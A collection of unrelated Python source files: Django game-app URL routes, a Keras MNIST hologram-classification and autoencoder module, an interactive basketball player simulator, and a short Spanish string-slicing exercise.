# above; that import appears unused — confirm and consider removing it.
router = routers.DefaultRouter()
router.register('juegos', JuegoViewSet)
# Site page views plus the DRF API include.
urlpatterns = [
    path('', index, name="index"),
    path('formulario/',formulario,name="formulario"),
    path('galeria/', galeria, name="galeria"),
    path('listado-juegos/', listado_juegos, name = "listado_juegos"),
    path('nuevo-juego/', nuevo_juego, name = "nuevo_juego"),
    path('modificar-juego/<id>/', modificar_juego, name = "modificar_juego"),
    path('eliminar-juego/<id>/', eliminar_juego , name="eliminar_juego"),
    path('api/', include(router.urls)),
]
|
from .firefighter_views import *
from .home_view import *
from .vehicle_views import *
from .equipment_views import *
from .service_views import *
from .history_equipment_views import *
from .history_vehicle_views import *
from .users_management_views import *
|
# mnist.py
import numpy as np
import matplotlib.pyplot as plt
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Flatten
from keras.layers import Convolution2D, MaxPooling2D
from keras.layers import Input, UpSampling2D
from keras.models import Model
from keras.utils import np_utils
from keras import backend as K
from . import recon_one as recon
import kkeras
np.random.seed(1337) # for reproducibility
class CNN():
    """Baseline MNIST digit classifier: two conv layers, max-pooling, and a
    dense softmax head. Written against the Keras 1.x API (Convolution2D,
    nb_epoch, K.image_dim_ordering)."""
    def __init__(self):
        """Load MNIST once; run() performs training and evaluation.

        self.Org keeps the untouched split; subclasses overwrite self.Data
        with transformed versions while preserving self.Org.
        """
        (X_train, y_train), (X_test, y_test) = mnist.load_data()
        self.Org = (X_train, y_train), (X_test, y_test)
        self.Data = self.Org
    def run(self, nb_epoch=12):
        """Train the CNN on self.Data for nb_epoch epochs and print the
        test score/accuracy."""
        batch_size = 128
        nb_classes = 10
        nb_epoch = nb_epoch
        # input image dimensions
        img_rows, img_cols = 28, 28
        # number of convolutional filters to use
        nb_filters = 32
        # size of pooling area for max pooling
        pool_size = (2, 2)
        # convolution kernel size
        kernel_size = (3, 3)
        # the data, shuffled and split between train and test sets
        # (X_train, y_train), (X_test, y_test) = mnist.load_data()
        (X_train, y_train), (X_test, y_test) = self.Data
        # Reshape to the backend's expected layout: 'th' = channels-first.
        if K.image_dim_ordering() == 'th':
            X_train = X_train.reshape(X_train.shape[0], 1, img_rows, img_cols)
            X_test = X_test.reshape(X_test.shape[0], 1, img_rows, img_cols)
            input_shape = (1, img_rows, img_cols)
        else:
            X_train = X_train.reshape(X_train.shape[0], img_rows, img_cols, 1)
            X_test = X_test.reshape(X_test.shape[0], img_rows, img_cols, 1)
            input_shape = (img_rows, img_cols, 1)
        # Scale pixel values to [0, 1].
        X_train = X_train.astype('float32')
        X_test = X_test.astype('float32')
        X_train /= 255
        X_test /= 255
        print('X_train shape:', X_train.shape)
        print(X_train.shape[0], 'train samples')
        print(X_test.shape[0], 'test samples')
        # convert class vectors to binary class matrices
        Y_train = np_utils.to_categorical(y_train, nb_classes)
        Y_test = np_utils.to_categorical(y_test, nb_classes)
        # conv -> relu -> conv -> relu -> pool -> dropout -> dense head
        model = Sequential()
        model.add(Convolution2D(nb_filters, kernel_size[0], kernel_size[1],
                                border_mode='valid',
                                input_shape=input_shape))
        model.add(Activation('relu'))
        model.add(Convolution2D(nb_filters, kernel_size[0], kernel_size[1]))
        model.add(Activation('relu'))
        model.add(MaxPooling2D(pool_size=pool_size))
        model.add(Dropout(0.25))
        model.add(Flatten())
        model.add(Dense(128))
        model.add(Activation('relu'))
        model.add(Dropout(0.5))
        model.add(Dense(nb_classes))
        model.add(Activation('softmax'))
        model.compile(loss='categorical_crossentropy',
                      optimizer='adadelta',
                      metrics=['accuracy'])
        model.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=nb_epoch,
                  verbose=1, validation_data=(X_test, Y_test))
        score = model.evaluate(X_test, Y_test, verbose=0)
        print('Test score:', score[0])
        print('Test accuracy:', score[1])
def holo_transform(Org):
    """Replace the images in an ((X_train, y), (X_test, y)) pair with their
    simulated hologram diffraction patterns; the second elements of each
    pair pass through unchanged."""
    (X_train, dump_train), (X_test, dump_test) = Org
    print('Performing hologram transformation...')
    simulator = recon.Simulator(X_train.shape[1:])
    diffract = simulator.diffract
    X_train_holo = np.array([diffract(image) for image in X_train])
    X_test_holo = np.array([diffract(image) for image in X_test])
    return (X_train_holo, dump_train), (X_test_holo, dump_test)
def recon_transform(Holo):
    """One-shot reconstruction (magnitude only) of hologram images; the
    second elements of each pair pass through unchanged."""
    (X_train_holo, dump_train), (X_test_holo, dump_test) = Holo
    print('Performing first-shot recon...')
    simulator = recon.Simulator(X_train_holo.shape[1:])
    reconstruct = simulator.reconstruct
    X_train_recon = np.array([np.abs(reconstruct(holo)) for holo in X_train_holo])
    X_test_recon = np.array([np.abs(reconstruct(holo)) for holo in X_test_holo])
    return (X_train_recon, dump_train), (X_test_recon, dump_test)
def update2(x_train, x_test):
    """Scale both image arrays to [0, 1] float32 and reshape each to
    (n, 1, 28, 28) (channels-first layout)."""
    def _prep(images):
        scaled = images.astype('float32') / 255.
        return np.reshape(scaled, (len(scaled), 1, 28, 28))
    return _prep(x_train), _prep(x_test)
class CNN_HOLO(CNN):
    def __init__(self):
        """
        This CNN includes hologram transformation.
        After transformation, CNN is working similarly.
        """
        super().__init__()
    def _holo_transform_r0(self):
        # Deprecated (r0) inline version of holo_transform; superseded by
        # the module-level holo_transform() and kept for reference.
        # Transform X_train and X_test using hologram filtering.
        (X_train, y_train), (X_test, y_test) = self.Org
        print('Performing hologram transformation...')
        sim = recon.Simulator(X_train.shape[1:])
        X_train_holo = np.array([sim.diffract(x) for x in X_train])
        X_test_holo = np.array([sim.diffract(x) for x in X_test])
        self.Data = (X_train_holo, y_train), (X_test_holo, y_test)
        self.Holo = self.Data
    def holo_transform(self):
        """Diffract self.Org via the module-level holo_transform and cache
        the result on self.Data / self.Holo."""
        self.Data = holo_transform(self.Org)
        self.Holo = self.Data
    def holo_complex_transform(self):
        """Diffract self.Org keeping the complex field, stored as a
        2-channel array (channel 0: magnitude, channel 1: phase); sets
        self.complex_flag so run() dispatches to run_complex()."""
        # Transform X_train and X_test using hologram filtering.
        (X_train, y_train), (X_test, y_test) = self.Org
        print('Performing complex hologram transformation...')
        sim = recon.Simulator(X_train.shape[1:])
        def holo(X_train):
            # Split the complex diffraction output into |.| and angle(.)
            # channels for a real-valued network input.
            X_train_holo_abs_l = []
            X_train_holo_ang_l = []
            for x in X_train:
                X_train_h = sim.diffract_full(x)
                X_train_holo_abs_l.append(np.abs(X_train_h))
                X_train_holo_ang_l.append(np.angle(X_train_h))
            X_train_holo = np.zeros(
                (X_train.shape[0], 2, X_train.shape[1], X_train.shape[2]))
            X_train_holo[:, 0, :, :] = np.array(X_train_holo_abs_l)
            X_train_holo[:, 1, :, :] = np.array(X_train_holo_ang_l)
            return X_train_holo
        X_train_holo = holo(X_train)
        X_test_holo = holo(X_test)
        self.Data = (X_train_holo, y_train), (X_test_holo, y_test)
        self.Holo_complex = self.Data
        self.complex_flag = True
    def _recon_transform_r0(self):
        # Deprecated (r0) inline version of recon_transform; kept for
        # reference.
        if not hasattr(self, 'Holo'):
            self.holo_transform()
        (X_train_holo, y_train), (X_test_holo, y_test) = self.Holo
        print('Performing first-shot recon...')
        sim = recon.Simulator(X_train_holo.shape[1:])
        X_train_recon = np.array([np.abs(sim.reconstruct(x))
                                  for x in X_train_holo])
        X_test_recon = np.array([np.abs(sim.reconstruct(x))
                                 for x in X_test_holo])
        self.Data = (X_train_recon, y_train), (X_test_recon, y_test)
        self.Recon = self.Data
    def recon_transform(self):
        """
        self.recon_transform is performed using the module-level
        recon_transform(); diffracts first if no hologram is cached yet.
        """
        if not hasattr(self, 'Holo'):
            self.holo_transform()
        self.Data = recon_transform(self.Holo)
        self.Recon = self.Data
    def run(self, nb_epoch=12):
        """Dispatch: complex 2-channel input goes to run_complex(); plain
        real input reuses the parent CNN.run()."""
        if hasattr(self, 'complex_flag') and self.complex_flag:
            print('Classification for complex input data...')
            self.run_complex(nb_epoch=nb_epoch)
        else:
            print('Classificaiton for real input data...')
            super().run(nb_epoch=nb_epoch)
    def run_complex(self, nb_epoch=12, kernel_size_1=None):
        """Train/evaluate the same CNN topology on the 2-channel
        (magnitude, phase) data; kernel_size_1 optionally overrides the
        first conv layer's kernel."""
        batch_size = 128
        nb_classes = 10
        nb_epoch = nb_epoch
        # input image dimensions
        img_rows, img_cols = 28, 28
        # number of convolutional filters to use
        nb_filters = 32
        # size of pooling area for max pooling
        pool_size = (2, 2)
        # convolution kernel size
        kernel_size = (3, 3)
        if kernel_size_1 is None:
            kernel_size_1 = kernel_size
        # the data, shuffled and split between train and test sets
        # (X_train, y_train), (X_test, y_test) = mnist.load_data()
        (X_train, y_train), (X_test, y_test) = self.Data
        # number of input data sets - abs and angle
        nb_rgb = X_train.shape[1]
        if K.image_dim_ordering() == 'th':
            input_shape = (nb_rgb, img_rows, img_cols)
        else:
            raise ValueError('Only th ordering is support yet for RGB data')
        X_train = X_train.astype('float32')
        X_test = X_test.astype('float32')
        # NOTE(review): /255 also scales the phase channel, whose values
        # come from np.angle (radians), not pixel counts — confirm this is
        # intended.
        X_train /= 255
        X_test /= 255
        print('X_train shape:', X_train.shape)
        print(X_train.shape[0], 'train samples')
        print(X_test.shape[0], 'test samples')
        # convert class vectors to binary class matrices
        Y_train = np_utils.to_categorical(y_train, nb_classes)
        Y_test = np_utils.to_categorical(y_test, nb_classes)
        model = Sequential()
        model.add(Convolution2D(nb_filters, kernel_size_1[0], kernel_size_1[1],
                                border_mode='valid',
                                input_shape=input_shape))
        model.add(Activation('relu'))
        model.add(Convolution2D(nb_filters, kernel_size[0], kernel_size[1]))
        model.add(Activation('relu'))
        model.add(MaxPooling2D(pool_size=pool_size))
        model.add(Dropout(0.25))
        model.add(Flatten())
        model.add(Dense(128))
        model.add(Activation('relu'))
        model.add(Dropout(0.5))
        model.add(Dense(nb_classes))
        model.add(Activation('softmax'))
        model.compile(loss='categorical_crossentropy',
                      optimizer='adadelta',
                      metrics=['accuracy'])
        model.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=nb_epoch,
                  verbose=1, validation_data=(X_test, Y_test))
        score = model.evaluate(X_test, Y_test, verbose=0)
        print('Test score:', score[0])
        print('Test accuracy:', score[1])
class AE:
    """Convolutional autoencoder for 28x28 MNIST images, channels-first
    ('th') layout. self.Data holds ((input, target), (input, target))
    pairs; for the base class input == target."""
    def __init__(self):
        (X_train, y_train), (X_test, y_test) = mnist.load_data()
        # Modify input and output data to be appropriate for an AE:
        # the image is both input and reconstruction target.
        self.Org = (X_train, X_train), (X_test, X_test)
        self.Data = self.Org
    def modeling(self):
        """Build the conv encoder/decoder and store it on self.autoencoder."""
        input_img = Input(shape=(1, 28, 28))
        # set-1
        x = Convolution2D(16, 3, 3, activation='relu',
                          border_mode='same')(input_img)  # 16,28,28
        x = MaxPooling2D((2, 2), border_mode='same')(x)  # 16,14,14
        x = Dropout(0.25)(x)  # Use dropout after maxpolling
        # set-2
        x = Convolution2D(8, 3, 3, activation='relu',
                          border_mode='same')(x)  # 8,14,14
        x = MaxPooling2D((2, 2), border_mode='same')(x)  # 8,7,7
        x = Dropout(0.25)(x)  # Use dropout after maxpolling
        # set-3
        x = Convolution2D(8, 3, 3, activation='relu',
                          border_mode='same')(x)  # 8,7,7
        encoded = x
        # Decoder: mirror of the encoder with upsampling.
        x = Convolution2D(8, 3, 3, activation='relu',
                          border_mode='same')(encoded)  # 8,7,7
        # x = Dropout(0.25)(x) # Use dropout after maxpolling
        x = UpSampling2D((2, 2))(x)  # 8,14,14
        x = Convolution2D(8, 3, 3, activation='relu',
                          border_mode='same')(x)  # 8,14,14
        # x = Dropout(0.25)(x) # Use dropout after maxpolling
        x = UpSampling2D((2, 2))(x)  # 8, 28, 28
        x = Convolution2D(16, 3, 3, activation='relu',
                          border_mode='same')(x)  # 16, 28, 28
        # x = Dropout(0.25)(x) # Use dropout after maxpolling
        decoded = Convolution2D(
            1, 3, 3, activation='sigmoid', border_mode='same')(x)  # 1, 28, 28
        autoencoder = Model(input_img, decoded)
        autoencoder.compile(optimizer='adadelta', loss='binary_crossentropy')
        self.autoencoder = autoencoder
    def run(self, nb_epoch=100):
        """Train on self.Data, plot the loss curve, then show sample
        reconstructions."""
        (x_train_in, x_train), (x_test_in, x_test) = self.Data
        x_train_in, x_test_in = update2(x_train_in, x_test_in)
        x_train, x_test = update2(x_train, x_test)
        self.modeling()
        autoencoder = self.autoencoder
        # NOTE(review): validation_data uses x_test as both input and
        # target. For subclasses where the input is transformed
        # (x_test_in != x_test, e.g. AE_HOLO) this validates on the wrong
        # input — confirm whether (x_test_in, x_test) was intended.
        history = autoencoder.fit(x_train_in, x_train,
                                  nb_epoch=nb_epoch,
                                  batch_size=128,
                                  shuffle=True,
                                  verbose=1,
                                  validation_data=(x_test, x_test))
        kkeras.plot_loss(history)
        self.imshow()
    #def imshow(self, x_test, x_test_in):
    def imshow(self):
        """Show 10 test originals (top row) above their reconstructions
        (bottom row)."""
        (_, _), (x_test_in, x_test) = self.Data
        x_test_in, x_test = update2(x_test_in, x_test)
        autoencoder = self.autoencoder
        decoded_imgs = autoencoder.predict(x_test_in)
        n = 10
        plt.figure(figsize=(20, 4))
        for i in range(n):
            # display original
            ax = plt.subplot(2, n, i + 1)
            plt.imshow(x_test[i].reshape(28, 28))
            plt.gray()
            ax.get_xaxis().set_visible(False)
            ax.get_yaxis().set_visible(False)
            # display reconstruction
            ax = plt.subplot(2, n, i + n + 1)
            plt.imshow(decoded_imgs[i].reshape(28, 28))
            plt.gray()
            ax.get_xaxis().set_visible(False)
            ax.get_yaxis().set_visible(False)
        plt.show()
class _AE_HOLO_r0(AE):
    # Deprecated (r0) revision of AE_HOLO, kept for reference (leading
    # underscore marks it non-public).
    def __init__(self):
        """
        Hologram transformation is performed
        """
        super().__init__()
    def holo_transform(self):
        """Diffract the inputs while keeping the original images as
        reconstruction targets; caches the pair on self.Data/self.Holo."""
        (x_train, _), (x_test, _) = self.Org
        (x_train_in, _), (x_test_in, _) = holo_transform(self.Org)
        self.Data = (x_train_in, x_train), (x_test_in, x_test)
        self.Holo = self.Data
    def imshow(self):
        """Show three rows: original, hologram input, reconstruction."""
        (_, _), (x_test_in, x_test) = self.Data
        x_test_in, x_test = update2(x_test_in, x_test)
        autoencoder = self.autoencoder
        decoded_imgs = autoencoder.predict(x_test_in)
        n = 10
        plt.figure(figsize=(20, 4))
        for i in range(n):
            # display original
            ax = plt.subplot(3, n, i + 1)
            plt.imshow(x_test[i].reshape(28, 28))
            plt.gray()
            ax.get_xaxis().set_visible(False)
            ax.get_yaxis().set_visible(False)
            # display the (hologram-transformed) network input
            ax = plt.subplot(3, n, n + i + 1)
            plt.imshow(x_test_in[i].reshape(28, 28))
            plt.gray()
            ax.get_xaxis().set_visible(False)
            ax.get_yaxis().set_visible(False)
            # display reconstruction
            ax = plt.subplot(3, n, n * 2 + i + 1)
            plt.imshow(decoded_imgs[i].reshape(28, 28))
            plt.gray()
            ax.get_xaxis().set_visible(False)
            ax.get_yaxis().set_visible(False)
        plt.show()
class AE_HOLO(AE):
    def __init__(self):
        """
        Hologram transformation is performed
        """
        super().__init__()
        # Rebuild self.Org as ((input, target), (input, target)) pairs so
        # the CNN_HOLO transforms below can diffract the inputs while the
        # targets stay as the original images.
        (x_train, _), (x_test, _) = self.Org
        x_train_in, x_test_in = x_train, x_test
        self.Org = (x_train_in, x_train), (x_test_in, x_test)
    def holo_transform(self):
        # Reuse CNN_HOLO's implementation as an unbound call: it only reads
        # self.Org and sets self.Data/self.Holo, all present on this class.
        CNN_HOLO.holo_transform(self)
    def recon_transform(self):
        # Same unbound-call reuse as holo_transform above.
        CNN_HOLO.recon_transform(self)
    def imshow(self):
        """Show three rows: original, hologram input, reconstruction
        (same layout as _AE_HOLO_r0.imshow)."""
        (_, _), (x_test_in, x_test) = self.Data
        x_test_in, x_test = update2(x_test_in, x_test)
        autoencoder = self.autoencoder
        decoded_imgs = autoencoder.predict(x_test_in)
        n = 10
        plt.figure(figsize=(20, 4))
        for i in range(n):
            # display original
            ax = plt.subplot(3, n, i + 1)
            plt.imshow(x_test[i].reshape(28, 28))
            plt.gray()
            ax.get_xaxis().set_visible(False)
            ax.get_yaxis().set_visible(False)
            # display the (hologram-transformed) network input
            ax = plt.subplot(3, n, n + i + 1)
            plt.imshow(x_test_in[i].reshape(28, 28))
            plt.gray()
            ax.get_xaxis().set_visible(False)
            ax.get_yaxis().set_visible(False)
            # display reconstruction
            ax = plt.subplot(3, n, n * 2 + i + 1)
            plt.imshow(decoded_imgs[i].reshape(28, 28))
            plt.gray()
            ax.get_xaxis().set_visible(False)
            ax.get_yaxis().set_visible(False)
        plt.show()
import random
#1.---CREATE PLAYER---
# 1.1 --Create Player Class--
class Player:
    """A basketball player: bio dicts, per-skill rating dicts, and career status.

    Each attribute is a dict produced by the *_function factory helpers below.
    NOTE(review): when populated from the input() prompts later in this file,
    every rating and Age is a *str*, so the arithmetic in player_ager() and
    teen_grower() would raise TypeError unless values are converted first --
    confirm intended usage.
    """
    def __init__ (self, vitals, measurements, traits,
                 threepoint_scoring, midrange_scoring, close_scoring, scoring_instincts, free_throw, driving_finesse,
                 driving_strong, onballD_perimeter, onballD_post, team_defense, stealing, shot_defense, shot_blocking, rebounding,
                 ball_handling, passing, post_control, lowpost_strong, lowpost_finesse, highpost_finesse, athleticism, years_pro):
        #Bio
        self.vitals = vitals
        self.measurements = measurements
        self.traits = traits
        #Skillz
        self.threepoint_scoring = threepoint_scoring
        self.midrange_scoring = midrange_scoring
        self.close_scoring = close_scoring
        self.scoring_instincts = scoring_instincts
        self.free_throw = free_throw
        self.driving_finesse = driving_finesse
        self.driving_strong = driving_strong
        self.onballD_perimeter = onballD_perimeter
        self.onballD_post = onballD_post
        self.team_defense = team_defense
        self.stealing = stealing
        self.shot_defense = shot_defense
        self.shot_blocking = shot_blocking
        self.rebounding = rebounding
        self.ball_handling = ball_handling
        self.passing = passing
        self.post_control = post_control
        self.lowpost_strong = lowpost_strong
        self.lowpost_finesse = lowpost_finesse
        self.highpost_finesse = highpost_finesse
        self.athleticism = athleticism
        #Status
        self.years_pro = years_pro
    def player_ager(self):
        """Advance the player by one year (age and seasons played)."""
        self.vitals['Age'] +=1
        self.years_pro +=1
    def teen_grower(self):
        """Compute teenage growth rates from traits.

        The application of growth to skills is entirely commented out below,
        so calling this currently has no observable effect.  The commented
        code also contains a typo (`self..vitals`) and references attributes
        (skill_IQ, skill_athleticism) that __init__ never sets -- it would
        need rework before being re-enabled.
        """
        growth_end_age = 20
        #define growth rates
        potential_mental_growthRate = 0.33 * (self.traits['talent']*0.01)
        actual_mental_growthRate = potential_mental_growthRate * random.uniform((self.traits['training discipline (mental)']*0.01),1)
        potential_physical_growthRate = 0.09 * (self.traits['physical hardiness']*0.01)
        actual_physical_growthRate = potential_physical_growthRate * random.uniform((self.traits['training discipline (physical)']*0.01),1)
        #apply growth
        #if self.vitals['age'] <= growth_end_age:
        #    self.skill_IQ['offensive awareness'] += (99 - self.skill_IQ['offensive awareness'])* (actual_mental_growthRate)
        #    self.skill_athleticism['strength'] += (99 - self.skill_athleticism['strength']) * (actual_physical_growthRate)
        #if self..vitals['position'] == 'PF' or 'C':
        #    self.skill_IQ['screen setting'] += (99 - self.skill_IQ['screen setting']) * (actual_mental_growthRate)
        #elif self.position == 'PG' or 'SG':
        #    self.skill_IQ['screen using'] += (99 - self.skill_IQ['screen using']) * (actual_mental_growthRate)
        #else:
        #    False
        #else:
        #    False
    #def early20s_grower(self):
    #    growth_end_age = 25
    #
    #    #define growth rates
    #    potential_mental_growthRate = 0.33 * (self.traits['talent']*0.01)
    #    actual_mental_growthRate = potential_mental_growthRate * (self.traits['mental discipline']*0.01)
# 1.2 --Create Instances of Player--
# 1.2.1 --Define attributes--
# Attribute factory helpers: each returns the rating dict for one skill group
# of a Player.  Keys are display names; values are the raw ratings passed in
# (NOTE(review): these stay str when fed straight from input() below).
def vital_function(name, age, position):
    return {'Name': name, 'Age':age, 'Position': position}
def measurement_function(height, weight, wingspan):
    return {'Height (inches)': height, 'Weight':weight, 'Wingspan': wingspan}
def trait_function(talent, drive, mental_disc, phys_hard, phys_disc):
    return {'talent': talent, 'drive': drive, 'training discipline (mental)': mental_disc, 'physical hardiness': phys_hard, 'training discipline (physical)': phys_disc}
def threepoint_scoring_function(open_3, offdribble_3, contested_3):
    return {'Open shot 3pt': open_3, 'Off dribble shot 3pt': offdribble_3, 'Contested shot 3pt': contested_3}
def midrange_scoring_function(open_mid, offdribble_mid, contested_mid):
    return {'Open shot midrange': open_mid, 'Off dribble shot midrange': offdribble_mid, 'Contested shot midrange': contested_mid}
def closerange_scoring_function(open_close, offdribble_close, contested_close):
    return {'Open shot closerange': open_close, 'Off dribble shot closerange': offdribble_close, 'Contested shot closerange': contested_close}
def scoring_instincts_function(shot_IQ, draw_foul, off_consistency):
    return {'Shot IQ': shot_IQ, 'Draw foul':draw_foul, 'Offensive consistency': off_consistency}
def free_throw_function(free_throw):
    return {'Free throw': free_throw}
def driving_finesse_function(driving_layup):
    return {'Driving layup': driving_layup}
def driving_strong_function(driving_dunk):
    return {'Driving dunk': driving_dunk}
def onballD_perimeter_function(onball_D, lat_quick):
    return {'On ball defense IQ': onball_D, 'Lateral quickness': lat_quick}
def onballD_post_function(post_D):
    return {'Post defense': post_D}
def team_defense_function(PnR_def_IQ, help_def_IQ, def_consistency):
    return {'Pick and roll defense IQ': PnR_def_IQ, 'Help defense IQ': help_def_IQ, 'Defensive consistency': def_consistency}
def stealing_function(steal, pass_percept, rxn_time):
    return {'Steal': steal, 'Pass perception': pass_percept, 'Reaction time': rxn_time}
def shot_defense_function(shot_contest):
    return {'Shot contest': shot_contest}
def shot_blocking_function(shot_block):
    return {'Shot blocking': shot_block}
def rebounding_function(off_reb, def_reb, boxout):
    return {'Offensive rebound': off_reb, 'Defensive rebound': def_reb, 'Boxout': boxout}
def ball_handling_function(ball_control, speed_w_ball):
    return {'Ball control': ball_control, 'Speed with ball': speed_w_ball}
def passing_function(pass_accuracy, pass_IQ, pass_vision):
    return {'Pass accuracy': pass_accuracy, 'Passing IQ': pass_IQ, 'Passing vision': pass_vision}
def post_control_function(post_control, hands):
    return {'Post control': post_control, 'Hands': hands}
def lowpost_strong_function(stand_dunk, contact_dunk):
    return {'Standing dunk': stand_dunk, 'Contact dunk':contact_dunk}
def lowpost_finesse_function(stand_layup, hook):
    return {'Standing layup': stand_layup, 'Post hook': hook}
def highpost_finesse_function(post_fade):
    return {'Post fadeaway':post_fade}
def athleticism_function(speed, accel, vert, strength, stamina, hustle, durability):
    return {'Speed': speed, 'Acceleration': accel, 'Vertical': vert, 'Strength': strength, 'Stamina':stamina, 'Hustle': hustle, 'Durability': durability}
# 1.2.2 --Create players--
#Take user inputs
# Interactively collect every bio/measurement/trait/skill rating.
# NOTE(review): input() returns str and nothing here converts to int/float,
# so all ratings (and Age) are stored as strings -- downstream arithmetic
# (player_ager, teen_grower) would need conversion first.
vital_input_name = input('Enter your player\'s name: ')
vital_input_age = input('Enter your player\'s age: ')
vital_input_position = input('Enter your player\'s position: ')
measurement_input_height = input('Enter your player\'s height: ')
measurement_input_weight = input('Enter your player\'s weight: ')
measurement_input_wingspan = input('Enter your player\'s wingspan: ')
trait_input_talent = input('Enter your player\'s talent: ')
trait_input_drive = input('Enter your player\'s drive: ')
trait_input_mentalDiscipline = input('Enter your player\'s training discipline (mental): ')
trait_input_physHard = input('Enter your player\'s physical hardiness: ')
trait_input_physDisc = input('Enter your player\'s training discipline (physical): ')
threepoint_input_scoring_open = input('Enter your player\'s Open Shot 3pt rating: ')
threepoint_input_scoring_offDribble = input('Enter your player\'s Off-dribble Shot 3pt rating: ')
threepoint_input_scoring_contested = input('Enter your player\'s Contested Shot 3pt rating: ')
midrange_input_scoring_open = input('Enter your player\'s Open Shot Midrange rating: ')
midrange_input_scoring_offDribble = input('Enter your player\'s Off-dribble Shot Midrange rating: ')
midrange_input_scoring_contested = input('Enter your player\'s Contested Shot Midrange rating: ')
close_input_scoring_open = input('Enter your player\'s Open Shot Close rating: ')
close_input_scoring_offDribble = input('Enter your player\'s Off-dribble Shot Close rating: ')
close_input_scoring_contested = input('Enter your player\'s Contested Shot Close rating: ')
scoring_instincts_input_shotIQ = input('Enter your player\'s Shot IQ rating: ')
scoring_instincts_input_drawFoul = input('Enter your player\'s draw foul rating: ')
scoring_instincts_input_offconsistency = input ('Enter your player\'s offensive consistency rating: ')
free_throw_input = input('Enter your player\'s free throw rating: ')
driving_finesse_input_drivinglayup = input('Enter your player\'s driving layup rating: ')
driving_strong_input_drivedunk = input('Enter your player\'s driving dunk rating: ')
onballD_perimeter_input_IQ = input('Enter your player\'s on ball defense IQ rating: ')
onballD_perimeter_input_latquick = input('Enter your player\'s lateral quickness rating: ')
onballD_post_input = input('Enter your player\'s post defense rating: ')
team_defense_input_PnR = input('Enter your player\'s pick and roll defense IQ rating: ')
team_defense_input_help = input('Enter your player\'s help defense IQ rating: ')
team_defense_input_consist = input('Enter your player\'s defensive consistency rating: ')
steal_input_stl = input('Enter your player\'s steal rating: ')
steal_input_passPercept = input('Enter your player\'s pass perception rating: ')
steal_input_rxn = input('Enter your player\'s reaction time rating: ')
shotContest_input = input('Enter your player\'s shot contest rating: ')
shotBlock_input = input('Enter your player\'s shot block rating: ')
rebounding_input_off = input('Enter your player\'s offensive rebounding rating: ')
rebounding_input_def = input('Enter your player\'s defensive rebounding rating: ')
rebounding_input_box = input('Enter your player\'s boxout rating: ')
ball_handling_input_control = input('Enter your player\'s ball control rating: ')
ball_handling_input_speed = input('Enter your player\'s speed with ball rating: ')
passing_input_accuracy = input('Enter your player\'s passing accuracy rating: ')
passing_input_IQ = input('Enter your player\'s passing IQ rating: ')
passing_input_vision = input('Enter your player\'s passing vision rating: ')
post_input_control = input('Enter your player\'s post control rating: ')
post_input_hands = input('Enter your player\'s hands rating: ')
lowpost_strong_input_standDunk = input('Enter your player\'s standing dunk rating: ')
lowpost_strong_input_contactDunk = input('Enter your player\'s contact dunk rating: ')
lowpost_finesse_input_standLayup = input('Enter your player\'s standing layup rating: ')
lowpost_finesse_input_hook = input('Enter your player\'s post hook rating: ')
highpost_finesse_input_fade = input('Enter your player\'s post fadeaway rating: ')
athleticism_input_speed = input('Enter your player\'s speed rating: ')
athleticism_input_accel = input('Enter your player\'s acceleration rating: ')
athleticism_input_vertical = input('Enter your player\'s vertical rating: ')
athleticism_input_strength = input('Enter your player\'s strength rating: ')
athleticism_input_stamina = input('Enter your player\'s stamina rating: ')
athleticism_input_hustle = input('Enter your player\'s hustle rating: ')
athleticism_input_durable = input('Enter your player\'s durability rating: ')
#Create player
# Assemble every dict via the factory helpers; the final 0 is years_pro.
player1 = Player(vital_function(vital_input_name, vital_input_age, vital_input_position),
                 measurement_function(measurement_input_height, measurement_input_weight, measurement_input_wingspan),
                 trait_function(trait_input_talent, trait_input_drive, trait_input_mentalDiscipline,trait_input_physHard,trait_input_physDisc),
                 threepoint_scoring_function(threepoint_input_scoring_open, threepoint_input_scoring_offDribble, threepoint_input_scoring_contested),
                 midrange_scoring_function(midrange_input_scoring_open, midrange_input_scoring_offDribble, midrange_input_scoring_contested),
                 closerange_scoring_function(close_input_scoring_open, close_input_scoring_offDribble, close_input_scoring_contested),
                 scoring_instincts_function(scoring_instincts_input_shotIQ, scoring_instincts_input_drawFoul, scoring_instincts_input_offconsistency),
                 free_throw_function(free_throw_input), driving_finesse_function(driving_finesse_input_drivinglayup),
                 driving_strong_function(driving_strong_input_drivedunk), onballD_perimeter_function(onballD_perimeter_input_IQ, onballD_perimeter_input_latquick),
                 onballD_post_function(onballD_post_input), team_defense_function(team_defense_input_PnR, team_defense_input_help, team_defense_input_consist),
                 stealing_function(steal_input_stl, steal_input_passPercept, steal_input_rxn), shot_defense_function(shotContest_input),
                 shot_blocking_function(shotBlock_input), rebounding_function(rebounding_input_off,rebounding_input_def, rebounding_input_box),
                 ball_handling_function(ball_handling_input_control, ball_handling_input_speed), passing_function(passing_input_accuracy, passing_input_IQ, passing_input_vision),
                 post_control_function(post_input_control, post_input_hands), lowpost_strong_function(lowpost_strong_input_standDunk, lowpost_strong_input_contactDunk),
                 lowpost_finesse_function(lowpost_finesse_input_standLayup, lowpost_finesse_input_hook), highpost_finesse_function(highpost_finesse_input_fade),
                 athleticism_function(athleticism_input_speed, athleticism_input_accel, athleticism_input_vertical, athleticism_input_strength, athleticism_input_stamina, athleticism_input_hustle, athleticism_input_durable),0
                 )
#2.---SIMULATE SEASONS---
#print(f'On draft day {player1.vitals['Name']} is {player1.age} years old, and his skill of offensive awareness is ' + str(int((player1.skill_IQ['offensive awareness']))))
# BUG FIX: the original wrapped each value in {...}, which builds a one-element
# set, so the message printed as "{'Name'} ... {'75'}block rating.".  Print the
# plain values and add the missing space before "block rating".
print('On draft day ' + str(player1.vitals['Name']) + ' exists. He has ' + str(player1.shot_blocking['Shot blocking']) + ' block rating.')
# Fixed eleven-iteration season loop; ageing/growth calls are still commented
# out, so for now it only echoes the (unchanging) age once per season.
season = 0
printcounter = 0
while season <= 10:
    if printcounter == 1:
        # print(f'After season {season}, ...')
        print('player age: ' + str(player1.vitals['Age']))
        printcounter = 0
    #player1.player_ager()
    #player1.teen_grower()
    printcounter += 1
    season += 1
|
#longitud25
# Slice characters 19..-21 of the sentence ("ad en la vid") and report the
# slice's length (12) using the format template in `msg`.
cadena ="La única discapacidad en la vida es una mala actitud"
msg ="la longitud del tex es {}"
tex = cadena[19:-21]
print(msg.format(len(tex)))
|
# -*- coding: utf-8 -*-
# (fixed the malformed "-- coding --" marker: it does not match the PEP 263
# pattern, so the declaration was silently ignored)
